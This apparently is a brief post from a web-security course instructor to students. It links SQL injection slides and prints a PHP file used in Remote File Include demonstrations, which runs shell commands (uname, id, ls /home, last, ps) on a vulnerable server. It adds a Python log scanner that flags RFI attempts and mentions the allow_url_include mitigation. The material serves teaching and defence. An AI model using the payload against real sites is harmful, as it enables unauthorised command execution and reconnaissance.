Quick post for my current SEC542 Students

Of course, if you aren’t one of my students, you can still read this. 🙂

In class I showed some extra slides on SQL injection. They are here: http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited

Additionally, for the RFI (Remote File Include) examples, I showed a text file with the following in it:

<?php
$command='uname -a;id -a';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";

echo "<hr size=3>";
$command='ls -lABF /home/';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";

echo "<hr size=3>";
$command='last -10';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";

echo "<hr size=3>";
$command='ps -aux';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";
?>
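
One way to spot requests that try to pull in a remote file like the one above is to look for query parameters whose value is itself a URL in the web server's access log. This is an added example, not code from the class or the original post; the log lines, host names and the `find_rfi_candidates` helper are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A decoded parameter value that is itself a remote URL
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, placeholder host names)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?page=http%3A%2F%2Ffiles.example.test%2Finfo.txt HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /index.php?lang=en&page=FTP://files.example.test/info.txt HTTP/1.1" 200 1999',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /search.php?q=what+is+http HTTP/1.1" 200 100',
]


def find_rfi_candidates(log_lines):
    """Return (client_ip, parameter, decoded_value) for every query
    parameter whose decoded value starts with a remote URL scheme."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes, so encoded URLs are caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append((client_ip, name, value))
    return hits


if __name__ == "__main__":
    for ip, param, value in find_rfi_candidates(SAMPLE_LOG):
        print(f"{ip} {param}={value}")
```

Legitimate parameters such as redirect targets also match, so treat hits as candidates to triage. On the server side, keeping PHP's `allow_url_include` set to Off stops `include` from fetching remote URLs at all.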

There were also some YouTube videos I referred to in class:

Enjoy!
